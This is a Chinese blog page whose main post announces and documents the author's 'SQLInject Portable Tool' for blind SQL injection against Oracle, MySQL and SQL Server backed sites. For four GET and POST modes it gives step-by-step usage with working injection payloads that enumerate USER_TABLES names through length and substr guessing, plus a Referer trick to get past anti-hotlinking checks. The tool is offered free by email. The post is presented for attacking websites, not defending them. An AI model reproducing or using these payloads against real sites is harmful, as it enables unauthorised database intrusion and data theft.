Windows LiveWindows Live
 
 
Dec0y's profile蜗牛的轨迹PhotosBlogLists Tools Help

Blog
    September 20

    PE结构图

    向底层进发!
    2:57 PM | Add a comment | Permalink | Blog it
    September 17

    我的工具显现出炉啦!SQLInject Portable Tool

         
          本工具是用来进行SQL注入的工具,主要针对一些没有错误返回信息的网站的表结构猜解(当然,如果有错误返回这个工具也适用,只是没必要使用这个工具了,因为有更好更快捷的工具),尤其是Java+Oracle,PHP+MySQL以及一部分ASP+SQLServer的网站。

    使用方法如下:
    1. Oracle+GET+数字猜解:
       a) URL的填写如下:
          http://www.XXX.com/tsl2.jsp?pname=1' and 0<nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) --
       b) 方法选择Get
       c) RefURL可填写(有些网站为防止盗链,必须填写)
       d) 选择IsNumber
       e) Position可由程序自动填写,将鼠标输入位置放到URL项需要做判断的数字(此处为"0")之后,程序自动填写Position;
       f) To填写范围,如果选择IsNumber,则为数字,否则为字符,此处为数字,如:255;
       g) Success condition为提交的URL条件成立时,网页内所含有的关键字(如果条件不成立,网页内一定不会含有),如:奶油
       h) Fire!
       i) 猜解的最终结果会以messagebox形式报告
    2. Oracle+POST+数字猜解:
       a) URL的填写如下:
          http://www.XXX.com/tsl2.jsp
       b) 方法选择POST,参数填写
          pname=1' and 0<nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) --&B1=提交
          多个参数以&间隔;
       c) RefURL可填写(有些网站为防止盗链,必须填写)
       d) 选择IsNumber
       e) Position可由程序自动填写,将鼠标输入位置放到POST参数项需要做判断的数字(此处为"0")之后,程序自动填写Position;
       f) To填写范围,如果选择IsNumber,则为数字,否则为字符,此处为数字,如:255;
       g) Success condition为提交的URL条件成立时,网页内所含有的关键字(如果条件不成立,网页内一定不会含有),如:奶油
       h) Fire!
       i) 猜解的最终结果会以messagebox形式报告
    3. Oracle+GET+字符猜解:
       a) URL的填写如下:
          http://www.XXX.com/tsl2.jsp?pname=1' or 'T'=substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES where table_name like '%USER%' ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1)--
       b) 方法选择Get
       c) RefURL可填写(有些网站为防止盗链,必须填写)
       d) 取消IsNumber
       e) Position可由程序自动填写,将鼠标输入位置放到URL项需要做判断的数字(此处为"T")之后,程序自动填写Position;
       f) To填写范围,如果选择IsNumber,则为数字,否则为字符,此处为字符,如:Z;
       g) Success condition为提交的URL条件成立时,网页内所含有的关键字(如果条件不成立,网页内一定不会含有),如:奶油
       h) Fire!
       i) 猜解的最终结果会以messagebox形式报告
    2. Oracle+POST+字符猜解:
       a) URL的填写如下:
          http://www.XXX.com/tsl2.jsp
       b) 方法选择POST,参数填写
          pname=1' or 'T'=substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES where table_name like '%USER%' ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1)--&B1=提交
          多个参数以&间隔;
       c) RefURL可填写(有些网站为防止盗链,必须填写)
       d) 取消IsNumber
       e) Position可由程序自动填写,将鼠标输入位置放到POST参数项需要做判断的数字(此处为"T")之后,程序自动填写Position;
       f) To填写范围,如果选择IsNumber,则为数字,否则为字符,此处为数字,如:Z;
       g) Success condition为提交的URL条件成立时,网页内所含有的关键字(如果条件不成立,网页内一定不会含有),如:奶油
       h) Fire!
       i) 猜解的最终结果会以messagebox形式报告
       
    您可以发送Email免费索取、使用、测试该软件。
       
       All By Dec0y(anti_decoy@126.com)
    11:39 AM | Add a comment | Permalink | Blog it